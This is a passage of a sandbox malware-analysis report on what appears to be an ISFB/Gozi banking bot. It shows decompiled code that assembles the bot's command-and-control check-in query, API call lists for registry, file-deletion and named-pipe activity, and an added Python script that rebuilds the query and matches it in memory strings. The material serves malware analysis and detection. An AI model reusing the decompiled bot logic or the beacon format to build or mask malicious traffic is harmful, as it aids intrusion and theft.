				_t3 = _t71 + 0x36db62b; // 0x74666f73 = "soft" (little-endian ASCII of the format-string dword)
                                                          				_t162 = wsprintfA(_t145, _t3, 3, 0x3d175, _t70, _t69, _t68, _t67,  *0x36da02c,  *0x36da004, _t66);
                                                          				_t74 = E036D6927();
                                                          				_t75 =  *0x36da348; // 0x228d5a8
				_t4 = _t75 + 0x36db66b; // 0x74707526 = "&upt"
                                                          				_t78 = wsprintfA(_t162 + _t145, _t4, _t74);
                                                          				_t176 =  &(_t174[0xe]);
                                                          				_t163 = _t162 + _t78;
                                                          				if(_a24 != 0) {
                                                          					_t141 =  *0x36da348; // 0x228d5a8
					_t8 = _t141 + 0x36db676; // 0x732526 = "&%s"
                                                          					_t144 = wsprintfA(_t163 + _t145, _t8, _a24);
                                                          					_t176 =  &(_t176[3]);
                                                          					_t163 = _t163 + _t144;
                                                          				}
                                                          				_t79 =  *0x36da348; // 0x228d5a8
                                                          				_t10 = _t79 + 0x36db78e; // 0x5968d36
                                                          				_t182 = _a20 - _t10;
				_t12 = _t79 + 0x36db2de; // 0x74636126 = "&act"
                                                          				_t157 = 0 | _t182 == 0x00000000;
                                                          				_t82 = wsprintfA(_t163 + _t145, _t12, _t182 == 0);
                                                          				_t177 =  &(_t176[3]);
                                                          				_t164 = _t163 + _t82;
                                                          				_t83 = E036D22D7(_t10);
                                                          				_a32 = _t83;
                                                          				if(_t83 != 0) {
                                                          					_t136 =  *0x36da348; // 0x228d5a8
					_t17 = _t136 + 0x36db8d0; // 0x736e6426 = "&dns"
                                                          					_t139 = wsprintfA(_t164 + _t145, _t17, _t83);
                                                          					_t177 =  &(_t177[3]);
                                                          					_t164 = _t164 + _t139;
                                                          					HeapFree( *0x36da2d8, 0, _a40);
                                                          				}
                                                          				_t84 = E036D2A11();
                                                          				_a32 = _t84;
                                                          				if(_t84 != 0) {
                                                          					_t132 =  *0x36da348; // 0x228d5a8
					_t21 = _t132 + 0x36db8d8; // 0x6f687726 = "&who"
                                                          					wsprintfA(_t164 + _t145, _t21, _t84);
                                                          					_t177 =  &(_t177[3]);
                                                          					HeapFree( *0x36da2d8, 0, _a40);
                                                          				}
                                                          				_t159 =  *0x36da3cc; // 0x59695b0
                                                          				_t86 = E036D2509(0x36da00a, _t159 + 4);
                                                          				_t165 = 0;
                                                          				_a16 = _t86;
                                                          				if(_t86 == 0) {
                                                          					L28:
                                                          					HeapFree( *0x36da2d8, _t165, _t145);
                                                          					return _a44;
                                                          				} else {
                                                          					_t89 = RtlAllocateHeap( *0x36da2d8, 0, 0x800);
                                                          					_a24 = _t89;
                                                          					if(_t89 == 0) {
                                                          						L27:
                                                          						HeapFree( *0x36da2d8, _t165, _a8);
                                                          						goto L28;
                                                          					}
                                                          					E036D1BE9(GetTickCount());
                                                          					_t93 =  *0x36da3cc; // 0x59695b0
                                                          					__imp__(_t93 + 0x40);
                                                          					asm("lock xadd [eax], ecx");
                                                          					_t97 =  *0x36da3cc; // 0x59695b0
                                                          					__imp__(_t97 + 0x40);
                                                          					_t99 =  *0x36da3cc; // 0x59695b0
                                                          					_t161 = E036D1D33(1, _t157, _t145,  *_t99);
                                                          					asm("lock xadd [eax], ecx");
                                                          					if(_t161 == 0) {
                                                          						L26:
                                                          						HeapFree( *0x36da2d8, _t165, _a16);
                                                          						goto L27;
                                                          					}
                                                          					StrTrimA(_t161, 0x36d928c);
                                                          					_push(_t161);
                                                          					_t105 = E036D393C();
                                                          					_v12 = _t105;
                                                          					if(_t105 == 0) {
                                                          						L25:
                                                          						HeapFree( *0x36da2d8, _t165, _t161);
                                                          						goto L26;
                                                          					}
                                                          					_t166 = __imp__;
                                                          					 *_t166(_t161, _a8);
                                                          					 *_t166(_a4, _v12);
                                                          					_t167 = __imp__;
                                                          					 *_t167(_v4, _v24);
                                                          					_t168 = E036D61FC( *_t167(_v12, _t161), _v20);
                                                          					_v36 = _t168;
                                                          					if(_t168 == 0) {
                                                          						_v8 = 8;
                                                          						L23:
                                                          						E036D561E();
                                                          						L24:
                                                          						HeapFree( *0x36da2d8, 0, _v40);
                                                          						_t165 = 0;
                                                          						goto L25;
                                                          					}
                                                          					_t115 = E036D10B7(_t145, 0xffffffffffffffff, _t161,  &_v24);
                                                          					_v12 = _t115;
                                                          					if(_t115 == 0) {
                                                          						_t171 = _v24;
                                                          						_v20 = E036D5B9D(_t171, _t168, _v16, _v12);
                                                          						_t123 =  *((intOrPtr*)(_t171 + 8));
                                                          						 *((intOrPtr*)( *_t123 + 0x80))(_t123);
                                                          						_t125 =  *((intOrPtr*)(_t171 + 8));
                                                          						 *((intOrPtr*)( *_t125 + 8))(_t125);
                                                          						_t127 =  *((intOrPtr*)(_t171 + 4));
                                                          						 *((intOrPtr*)( *_t127 + 8))(_t127);
                                                          						_t129 =  *_t171;
                                                          						 *((intOrPtr*)( *_t129 + 8))(_t129);
                                                          						E036D6C2C(_t171);
                                                          					}
                                                          					if(_v8 != 0x10d2) {
                                                          						L18:
                                                          						if(_v8 == 0) {
                                                          							_t117 = _v16;
                                                          							if(_t117 != 0) {
                                                          								_t118 =  *_t117;
                                                          								_t169 =  *_v12;
                                                          								_v16 = _t118;
                                                          								wcstombs(_t118, _t118,  *_v12);
                                                          								 *_v24 = E036D3C22(_v16, _v16, _t169 >> 1);
                                                          							}
                                                          						}
                                                          						goto L21;
                                                          					} else {
                                                          						if(_v16 != 0) {
                                                          							L21:
                                                          							E036D6C2C(_v32);
                                                          							if(_v12 == 0 || _v8 == 0x10d2) {
                                                          								goto L24;
                                                          							} else {
                                                          								goto L23;
                                                          							}
                                                          						}
                                                          						_v8 = _v8 & 0x00000000;
                                                          						goto L18;
                                                          					}
                                                          				}
                                                          			}
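Worked example (added by the editor; it is not part of the Joe Sandbox report and not code from the sample): E036D300E builds the bot's check-in query with a chain of wsprintfA calls. The page shows the runtime values of the four dwords that are byte-swapped into the `user` field, the constants 3 and 0x3d175 (250229) passed as the first two arguments, and the leading dword of each format fragment ("soft", "&upt", "&%s", "&act", "&dns", "&who"). The full format string is not on the page; the script below assumes the one documented in public ISFB/Gozi write-ups, `soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x`, and that the "&upt" fragment formats the value returned by E036D6927 with `%u`. The `server`, `id`, `crc` and uptime values are not annotated on the page and are made up here, as is the sample strings output the matcher runs over.

```python
"""
Added example: reconstruct the check-in query that E036D300E assembles with
wsprintfA, from the runtime values the decompiler annotated, and match such
queries in strings pulled from a memory dump.

Assumptions not on the page: the format string at 0x36db62b is the one public
ISFB/Gozi write-ups document,
  "soft=%u&version=%u&user=%08x%08x%08x%08x&server=%u&id=%u&crc=%x"
(the listing shows only its first dword, "soft", and the nine arguments), and
the "&upt" fragment takes the value returned by E036D6927 as "%u".
"""
import re
import struct

# Dword hints the decompiler attached to the format-string pointers.
FORMAT_HINTS = {
    0x36db62b: 0x74666f73,  # "soft"
    0x36db66b: 0x74707526,  # "&upt"
    0x36db676: 0x00732526,  # "&%s"
    0x36db2de: 0x74636126,  # "&act"
    0x36db8d0: 0x736e6426,  # "&dns"
    0x36db8d8: 0x6f687726,  # "&who"
}

# Runtime values at 0x36da00c..0x36da018, in the argument order of the first
# wsprintfA call (the function bswaps each one before pushing it).
USER_DWORDS = (0x81762942, 0xd8d2f808, 0x3a87c8cd, 0x3df0b315)
SOFT = 3
VERSION = 0x3d175  # 250229


def dword_ascii(value: int) -> str:
    """Decode a little-endian dword hint to the ASCII it spells (NULs trimmed)."""
    return value.to_bytes(4, "little").rstrip(b"\x00").decode("ascii")


def bswap32(value: int) -> int:
    """Emulate the `bswap eax` applied to each user dword before the call."""
    return struct.unpack(">I", struct.pack("<I", value))[0]


def user_id(dwords=USER_DWORDS) -> str:
    """Four bswapped dwords, each printed with %08x, give the 32-hex-digit bot ID."""
    return "".join(f"{bswap32(d):08x}" for d in dwords)


def checkin_query(server: int, bot_id: int, crc: int, uptime: int) -> str:
    """Emulate the first two wsprintfA calls. server/id/crc/uptime are not
    annotated on the page, so the caller supplies them (assumed format)."""
    return (f"soft={SOFT}&version={VERSION}&user={user_id()}"
            f"&server={server}&id={bot_id}&crc={crc:x}&upt={uptime}")


# Matcher for the plaintext form as it appears in memory strings; trailing
# "&name=value" pairs cover the optional &act/&dns/&who fragments.
CHECKIN_RE = re.compile(
    r"\bsoft=\d+&version=\d+&user=[0-9a-f]{32}&server=\d+&id=\d+&crc=[0-9a-f]+"
    r"(?:&upt=\d+)?(?:&[a-z]+=[^&\s]*)*",
    re.IGNORECASE,
)


def find_checkins(lines):
    """Return (line_number, matched_query) for every line holding a check-in query."""
    hits = []
    for n, line in enumerate(lines, 1):
        m = CHECKIN_RE.search(line)
        if m:
            hits.append((n, m.group(0)))
    return hits


# Constructed sample "strings" output: two benign lines and one query built
# from the page's values with made-up server/id/crc/uptime.
SAMPLE_STRINGS = [
    "GET /update?x=1 HTTP/1.1",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64)",
    "/images/" + checkin_query(server=12, bot_id=3535, crc=0x1d2e3f, uptime=42),
]

if __name__ == "__main__":
    for addr, hint in FORMAT_HINTS.items():
        print(f"{addr:#x}: {dword_ascii(hint)!r}")
    print("user =", user_id())
    for n, q in find_checkins(SAMPLE_STRINGS):
        print(f"line {n}: {q}")
```

Two caveats for anyone turning this into detection: the `version` (250229) and the 32-hex-digit `user` value are the stable pivots here, and public ISFB analyses describe the query being encrypted and base64-encoded into the URI path before it leaves the host, so the plaintext matcher is meant for process-memory strings or decrypted traffic rather than raw proxy logs.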
Instruction addresses for the C-code listing above (the side-by-side address column, flattened by extraction):
0x036d300e
0x036d300e
0x036d3012
0x036d3019
0x036d3023
0x036d3025
0x036d3025
0x036d3032
0x036d303d
0x036d3040
0x036d304b
0x036d304e
0x036d3053
0x036d3056
0x036d305b
0x036d305e
0x036d306a
0x036d3077
0x036d3079
0x036d307f
0x036d3084
0x036d308f
0x036d3091
0x036d3094
0x036d309b
0x036d309d
0x036d30a6
0x036d30b1
0x036d30b3
0x036d30b6
0x036d30b6
0x036d30b8
0x036d30bd
0x036d30c5
0x036d30c9
0x036d30cf
0x036d30d8
0x036d30da
0x036d30dd
0x036d30df
0x036d30ea
0x036d30f0
0x036d30f3
0x036d30f8
0x036d3103
0x036d3105
0x036d310c
0x036d3116
0x036d3116
0x036d3118
0x036d311d
0x036d3123
0x036d3126
0x036d312b
0x036d3135
0x036d3137
0x036d3146
0x036d3146
0x036d3148
0x036d3156
0x036d315b
0x036d315d
0x036d3163
0x036d3343
0x036d334b
0x036d3358
0x036d3169
0x036d3175
0x036d317b
0x036d3181
0x036d3336
0x036d3341
0x00000000
0x036d3341
0x036d318d
0x036d3192
0x036d319b
0x036d31ac
0x036d31b0
0x036d31b9
0x036d31bf
0x036d31cc
0x036d31d9
                                                          0x036d31df
                                                          0x036d3329
                                                          0x036d3334
                                                          0x00000000
                                                          0x036d3334
                                                          0x036d31eb
                                                          0x036d31f1
                                                          0x036d31f2
                                                          0x036d31f7
                                                          0x036d31fd
                                                          0x036d331f
                                                          0x036d3327
                                                          0x00000000
                                                          0x036d3327
                                                          0x036d3207
                                                          0x036d320e
                                                          0x036d3218
                                                          0x036d321e
                                                          0x036d3228
                                                          0x036d323a
                                                          0x036d323c
                                                          0x036d3242
                                                          0x036d335b
                                                          0x036d330a
                                                          0x036d330a
                                                          0x036d330f
                                                          0x036d331b
                                                          0x036d331d
                                                          0x00000000
                                                          0x036d331d
                                                          0x036d324d
                                                          0x036d3252
                                                          0x036d3258
                                                          0x036d3263
                                                          0x036d326e
                                                          0x036d3272
                                                          0x036d3278
                                                          0x036d327e
                                                          0x036d3284
                                                          0x036d3287
                                                          0x036d328d
                                                          0x036d3290
                                                          0x036d3295
                                                          0x036d3299
                                                          0x036d3299
                                                          0x036d32a6
                                                          0x036d32b4
                                                          0x036d32b9
                                                          0x036d32bb
                                                          0x036d32c1
                                                          0x036d32c7
                                                          0x036d32c9
                                                          0x036d32ce
                                                          0x036d32d2
                                                          0x036d32ee
                                                          0x036d32ee
                                                          0x036d32c1
                                                          0x00000000
                                                          0x036d32a8
                                                          0x036d32ad
                                                          0x036d32f0
                                                          0x036d32f4
                                                          0x036d32fe
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x00000000
                                                          0x036d32fe
                                                          0x036d32af
                                                          0x00000000
                                                          0x036d32af
                                                          0x036d32a6

                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 036D3025
                                                          • wsprintfA.USER32 ref: 036D3072
                                                          • wsprintfA.USER32 ref: 036D308F
                                                          • wsprintfA.USER32 ref: 036D30B1
                                                          • wsprintfA.USER32 ref: 036D30D8
                                                          • wsprintfA.USER32 ref: 036D3103
                                                          • HeapFree.KERNEL32(00000000,?), ref: 036D3116
                                                          • wsprintfA.USER32 ref: 036D3135
                                                          • HeapFree.KERNEL32(00000000,?), ref: 036D3146
                                                          • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 036D3175
                                                          • GetTickCount.KERNEL32 ref: 036D3187
                                                          • RtlEnterCriticalSection.NTDLL(05969570), ref: 036D319B
                                                          • RtlLeaveCriticalSection.NTDLL(05969570), ref: 036D31B9
                                                            • Part of subcall function 036D1D33: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,75BCC740,036D58D7,00000000,059695B0), ref: 036D1D5E
                                                            • Part of subcall function 036D1D33: lstrlen.KERNEL32(00000000,?,75BCC740,036D58D7,00000000,059695B0), ref: 036D1D66
                                                            • Part of subcall function 036D1D33: strcpy.NTDLL ref: 036D1D7D
                                                            • Part of subcall function 036D1D33: lstrcat.KERNEL32(00000000,00000000), ref: 036D1D88
                                                            • Part of subcall function 036D1D33: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,036D58D7,?,75BCC740,036D58D7,00000000,059695B0), ref: 036D1DA5
                                                          • StrTrimA.SHLWAPI(00000000,036D928C,?,059695B0), ref: 036D31EB
                                                            • Part of subcall function 036D393C: lstrlen.KERNEL32(05969B68,00000000,00000000,00000000,036D5902,00000000), ref: 036D394C
                                                            • Part of subcall function 036D393C: lstrlen.KERNEL32(?), ref: 036D3954
                                                            • Part of subcall function 036D393C: lstrcpy.KERNEL32(00000000,05969B68), ref: 036D3968
                                                            • Part of subcall function 036D393C: lstrcat.KERNEL32(00000000,?), ref: 036D3973
                                                          • lstrcpy.KERNEL32(00000000,?), ref: 036D320E
                                                          • lstrcpy.KERNEL32(?,?), ref: 036D3218
                                                          • lstrcat.KERNEL32(?,?), ref: 036D3228
                                                          • lstrcat.KERNEL32(?,00000000), ref: 036D322F
                                                            • Part of subcall function 036D61FC: lstrlen.KERNEL32(?,00000000,05969D70,00000000,036D39E8,05969F93,69B25F44,?,?,?,?,69B25F44,00000005,036DA00C,4D283A53,?), ref: 036D6203
                                                            • Part of subcall function 036D61FC: mbstowcs.NTDLL ref: 036D622C
                                                            • Part of subcall function 036D61FC: memset.NTDLL ref: 036D623E
                                                          • wcstombs.NTDLL ref: 036D32D2
                                                            • Part of subcall function 036D5B9D: SysAllocString.OLEAUT32(?), ref: 036D5BD8
                                                            • Part of subcall function 036D6C2C: RtlFreeHeap.NTDLL(00000000,00000000,036D5E1D,00000000,?,?,00000000), ref: 036D6C38
                                                          • HeapFree.KERNEL32(00000000,?), ref: 036D331B
                                                          • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 036D3327
                                                          • HeapFree.KERNEL32(00000000,?,?,059695B0), ref: 036D3334
                                                          • HeapFree.KERNEL32(00000000,?), ref: 036D3341
                                                          • HeapFree.KERNEL32(00000000,?), ref: 036D334B
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443349706.00000000036D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 036D0000, based on PE: true
                                                          • Associated: 00000002.00000002.443341044.00000000036D0000.00000004.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443360536.00000000036D9000.00000002.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443368684.00000000036DA000.00000004.10000000.00040000.00000000.sdmp
                                                          • Associated: 00000002.00000002.443376893.00000000036DC000.00000002.10000000.00040000.00000000.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_36d0000_rundll32.jbxd
                                                          Similarity
                                                          • API ID: Heap$Free$wsprintf$lstrlen$lstrcat$lstrcpy$CountCriticalSectionTickTrim$AllocAllocateEnterLeaveStringmbstowcsmemsetstrcpywcstombs
                                                          • String ID:
                                                          • API String ID: 967369141-0
                                                          • Opcode ID: d8c1cb5ddb61ace1df39049e49f52818066488247e4b52994d7867d18709bc5e
                                                          • Instruction ID: 544b9c445089f4d4db39989e49b2ca8a95d54313d154d01ce6d9541e1ab3177f
                                                          • Opcode Fuzzy Hash: d8c1cb5ddb61ace1df39049e49f52818066488247e4b52994d7867d18709bc5e
                                                          • Instruction Fuzzy Hash: 37A1AD75D06300AFC711EFA5ED48E5A7BE8EF88714F191918F848D7228CB32D865CB96
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • GetLastError.KERNEL32 ref: 0628CED3
                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 0628CEEF
                                                          • GetLastError.KERNEL32 ref: 0628CF3E
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 0628CF54
                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 0628CF68
                                                          • GetLastError.KERNEL32 ref: 0628CF82
                                                          • GetLastError.KERNEL32 ref: 0628CFB5
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 0628CFD3
                                                          • lstrlenW.KERNEL32(00000000,?), ref: 0628CFFF
                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 0628D014
                                                          • DeleteFileW.KERNEL32(?,00000000,?,?,00000000,00000000,00000001), ref: 0628D0E8
                                                          • HeapFree.KERNEL32(00000000,?), ref: 0628D0F7
                                                          • WaitForSingleObject.KERNEL32(00000000), ref: 0628D10C
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 0628D11F
                                                          • HeapFree.KERNEL32(00000000,?), ref: 0628D131
                                                          • RtlExitUserThread.NTDLL(?,?), ref: 0628D146
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Heap$Free$ErrorLast$Allocate$DeleteExitFileObjectSingleThreadUserWaitlstrlen
                                                          • String ID:
                                                          • API String ID: 3853681310-3916222277
                                                          • Opcode ID: c42ecb42fe1e352d7a2b647c8315867c4794d24e93178c47a5a5a9b47da872de
                                                          • Instruction ID: a8e280dd71e6d5d31be38928036a0180f63a71b1a1f33d7a44839b7fa5bd3ca7
                                                          • Opcode Fuzzy Hash: c42ecb42fe1e352d7a2b647c8315867c4794d24e93178c47a5a5a9b47da872de
                                                          • Instruction Fuzzy Hash: 27815E71A1130AAFDB11AFA4EC88EAE7BB9EF89304F04441AFA05E7290D7345945DF70
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • RegOpenKeyA.ADVAPI32(80000001,?,?), ref: 06287F9B
                                                          • RtlEnterCriticalSection.NTDLL(00000000), ref: 06287FB8
                                                          • CloseHandle.KERNEL32(?,?,?,?,00000000), ref: 06288008
                                                          • DeleteFileW.KERNEL32(00000000,?,?,?,00000000), ref: 06288012
                                                          • GetLastError.KERNEL32 ref: 0628801C
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 0628802D
                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,00000000), ref: 0628804F
                                                          • HeapFree.KERNEL32(00000000,?), ref: 06288086
                                                          • RtlLeaveCriticalSection.NTDLL(00000000), ref: 0628809A
                                                          • RegCloseKey.ADVAPI32(?,?,?,00000000), ref: 062880A3
                                                          • SuspendThread.KERNEL32(?), ref: 062880B2
                                                          • CreateEventA.KERNEL32(0629A1E8,00000001,00000000), ref: 062880C6
                                                          • SetEvent.KERNEL32(00000000), ref: 062880D3
                                                          • CloseHandle.KERNEL32(00000000), ref: 062880DA
                                                          • Sleep.KERNEL32(000001F4), ref: 062880ED
                                                          • ResumeThread.KERNEL32(?), ref: 06288111
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseFreeHeap$CriticalEventHandleSectionThread$CreateDeleteEnterErrorFileLastLeaveOpenResumeSleepSuspend
                                                          • String ID: v
                                                          • API String ID: 1011176505-1801730948
                                                          • Opcode ID: e6ade0d62cae29b262dcc6102884740d81d533ee42705cab10a9e1faa87c835a
                                                          • Instruction ID: 45f1391b070429eaeef75f5a42ade41f28c0fc266976e7ad1d20b06e44ad9274
                                                          • Opcode Fuzzy Hash: e6ade0d62cae29b262dcc6102884740d81d533ee42705cab10a9e1faa87c835a
                                                          • Instruction Fuzzy Hash: 2D41817291230AEFCB51AFA4FC8C9AD7BBAFB88344B144029FB05E2150D7355994DFA0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 06291ECA: RegQueryValueExA.KERNEL32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,06272C89,?), ref: 06291F02
                                                            • Part of subcall function 06291ECA: RtlAllocateHeap.NTDLL(00000000,?), ref: 06291F16
                                                            • Part of subcall function 06291ECA: RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,?,00000000,?,?,00000000,?,?,?,06272C89,?), ref: 06291F30
                                                            • Part of subcall function 06291ECA: RegCloseKey.KERNEL32(?,?,00000000,?,?,00000000,?,?,?,06272C89,?,?,?), ref: 06291F5A
                                                          • HeapFree.KERNEL32(00000000,?,?,?,?), ref: 06272CA9
                                                          • RtlAllocateHeap.NTDLL(00000000,00010000,?), ref: 06272CC7
                                                          • HeapFree.KERNEL32(00000000,00000000,00000029,00000000,00000000,?), ref: 06272CF3
                                                          • HeapFree.KERNEL32(00000000,00000000,0000002A,00000000,00000000,00000000,00000000,?,00000000,?,?,?), ref: 06272D62
                                                          • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 06272DDA
                                                          • wsprintfA.USER32 ref: 06272DF6
                                                          • lstrlen.KERNEL32(00000000,00000000), ref: 06272E01
                                                          • HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000), ref: 06272E18
                                                          • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 06272EA4
                                                          • wsprintfA.USER32 ref: 06272EBF
                                                          • lstrlen.KERNEL32(00000000,00000000), ref: 06272ECA
                                                          • HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000), ref: 06272EE1
                                                          • HeapFree.KERNEL32(00000000,?,?,?,00000008,0000000B,?,?,?,00000001,00000000,?,00000000,?,?,?), ref: 06272F03
                                                          • RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 06272F1E
                                                          • wsprintfA.USER32 ref: 06272F35
                                                          • lstrlen.KERNEL32(00000000,00000000), ref: 06272F40
                                                            • Part of subcall function 06273172: lstrlen.KERNEL32(062743C6,00000000,?,?,?,?,062743C6,00000035,00000000,?,00000000), ref: 062731A2
                                                            • Part of subcall function 06273172: RtlAllocateHeap.NTDLL(00000000,00000000,00000000), ref: 062731B8
                                                            • Part of subcall function 06273172: memcpy.NTDLL(00000010,062743C6,00000000,?,?,062743C6,00000035,00000000), ref: 062731EE
                                                            • Part of subcall function 06273172: memcpy.NTDLL(00000010,00000000,00000035,?,?,062743C6,00000035), ref: 06273209
                                                            • Part of subcall function 06273172: CallNamedPipeA.KERNEL32(00000000,00000000,?,00000010,00000028,00000001), ref: 06273227
                                                            • Part of subcall function 06273172: GetLastError.KERNEL32(?,?,062743C6,00000035), ref: 06273231
                                                            • Part of subcall function 06273172: HeapFree.KERNEL32(00000000,00000000,?,?,062743C6,00000035), ref: 06273254
                                                          • HeapFree.KERNEL32(00000000,00000000,0000001C,00000000,00000000), ref: 06272F57
                                                          • HeapFree.KERNEL32(00000000,?,0000001D,00000008,?,06898A20), ref: 06272F83
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Heap$Free$Allocate$lstrlen$wsprintf$QueryValuememcpy$CallCloseErrorLastNamedPipe
                                                          • String ID:
                                                          • API String ID: 3130754786-0
                                                          • Opcode ID: f12098edaa4d1412e04b88ef8589fa0e983bd04dadc9bf5a65ae40c7047656a6
                                                          • Instruction ID: 045360fc81878d09226498a9763af5e14a9b7ed0ddcfae95afa291874e39bed3
                                                          • Opcode Fuzzy Hash: f12098edaa4d1412e04b88ef8589fa0e983bd04dadc9bf5a65ae40c7047656a6
                                                          • Instruction Fuzzy Hash: C8A18D71D1120AEFDB519FA5EC88EAEBBBAFF88344B004029EA05A3250D7315E45DF70
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • lstrlenW.KERNEL32(?), ref: 062811AA
                                                            • Part of subcall function 0628BAD1: lstrlenW.KERNEL32(?,00000000,00000001,?,00000250,?,00000000), ref: 0628BB1D
                                                            • Part of subcall function 0628BAD1: lstrlenW.KERNEL32(?,?,00000000), ref: 0628BB29
                                                            • Part of subcall function 0628BAD1: memset.NTDLL ref: 0628BB71
                                                            • Part of subcall function 0628BAD1: FindFirstFileW.KERNEL32(00000000,00000000), ref: 0628BB8C
                                                            • Part of subcall function 0628BAD1: lstrlenW.KERNEL32(0000002C), ref: 0628BBC4
                                                            • Part of subcall function 0628BAD1: lstrlenW.KERNEL32(?), ref: 0628BBCC
                                                            • Part of subcall function 0628BAD1: memset.NTDLL ref: 0628BBEF
                                                            • Part of subcall function 0628BAD1: wcscpy.NTDLL ref: 0628BC01
                                                            • Part of subcall function 0628BAD1: PathFindFileNameW.SHLWAPI(0000001C,?,?,?,?,00000000), ref: 0628BC27
                                                            • Part of subcall function 0628BAD1: RtlEnterCriticalSection.NTDLL(?), ref: 0628BC5D
                                                            • Part of subcall function 0628BAD1: RtlLeaveCriticalSection.NTDLL(?), ref: 0628BC79
                                                            • Part of subcall function 0628BAD1: FindNextFileW.KERNEL32(?,00000000), ref: 0628BC92
                                                            • Part of subcall function 0628BAD1: WaitForSingleObject.KERNEL32(00000000), ref: 0628BCA4
                                                            • Part of subcall function 0628BAD1: FindClose.KERNEL32(?), ref: 0628BCB9
                                                            • Part of subcall function 0628BAD1: FindFirstFileW.KERNEL32(00000000,00000000), ref: 0628BCCD
                                                            • Part of subcall function 0628BAD1: lstrlenW.KERNEL32(0000002C), ref: 0628BCEF
                                                          • RtlAllocateHeap.NTDLL(00000000,00000036,?), ref: 06281206
                                                          • memcpy.NTDLL(00000000,?,00000000), ref: 06281219
                                                          • lstrcpyW.KERNEL32(00000000,?), ref: 06281230
                                                            • Part of subcall function 0628BAD1: FindNextFileW.KERNEL32(?,00000000), ref: 0628BD65
                                                            • Part of subcall function 0628BAD1: WaitForSingleObject.KERNEL32(00000000), ref: 0628BD77
                                                            • Part of subcall function 0628BAD1: FindClose.KERNEL32(?), ref: 0628BD92
                                                          • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,00000000,00000000,00000010), ref: 0628125B
                                                          • RtlAllocateHeap.NTDLL(00000000,0000020C), ref: 06281273
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 062812CD
                                                          • lstrlenW.KERNEL32(00000000,?), ref: 062812F0
                                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 06281302
                                                          • HeapFree.KERNEL32(00000000,00000000,00000000,?,?,00000000,00000000,00000014), ref: 06281376
                                                          • HeapFree.KERNEL32(00000000,?), ref: 06281386
                                                            • Part of subcall function 0627AE7C: lstrlen.KERNEL32(0627E448,00000000,00000000,?,?,06287A5B,?,?,?,?,0627E448,?), ref: 0627AE8B
                                                            • Part of subcall function 0627AE7C: mbstowcs.NTDLL ref: 0627AEA7
                                                          • CreateDirectoryW.KERNEL32(00000000,00000000,?), ref: 062813AF
                                                          • lstrlenW.KERNEL32(0629B878,?), ref: 06281429
                                                          • DeleteFileW.KERNEL32(?,?), ref: 06281457
                                                          • HeapFree.KERNEL32(00000000,?), ref: 06281465
                                                          • HeapFree.KERNEL32(00000000,?), ref: 06281486
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.443956530.0000000006270000.00000040.10000000.00040000.00000000.sdmp, Offset: 06270000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_6270000_rundll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Heaplstrlen$Find$FileFree$Allocate$CloseCriticalFirstNextObjectSectionSingleWaitmemset$CreateDeleteDirectoryEnterLeaveNamePathlstrcpymbstowcsmemcpywcscpy
                                                          • String ID:
                                                          • API String ID: 72361108-0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                            • Part of subcall function 06279394: RtlAllocateHeap.NTDLL(00000000,?,06280051), ref: 062793A0
                                                          • memset.NTDLL ref: 06275465
                                                          • StrChrA.SHLWAPI(?,0000000D), ref: 062754AB
                                                          • StrChrA.SHLWAPI(?,0000000A), ref: 062754B8
